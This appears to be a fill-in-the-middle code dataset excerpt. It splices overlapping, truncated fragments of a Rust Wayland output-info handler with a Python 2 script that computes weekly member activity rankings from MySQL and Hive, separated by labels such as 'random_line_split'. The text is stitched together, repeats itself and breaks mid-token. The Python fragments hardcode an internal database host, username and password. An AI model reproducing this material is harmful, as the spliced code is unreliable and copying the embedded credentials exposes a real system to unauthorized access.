pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
| /// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn merge_event(info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else {
false
}
});
}
fn notify_status_listeners(
output: &Attached<Wl | /// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically | random_line_split |
output.rs | for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
/// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically
/// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn merge_event(info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else |
});
}
fn notify_status_listeners(
output: &Attached | {
false
} | conditional_block |
memberweekactrank.py | (s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
)
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topic | runHiveQL | identifier_name | |
memberweekactrank.py | undir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(use | rid)
r | conditional_block | |
memberweekactrank.py |
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
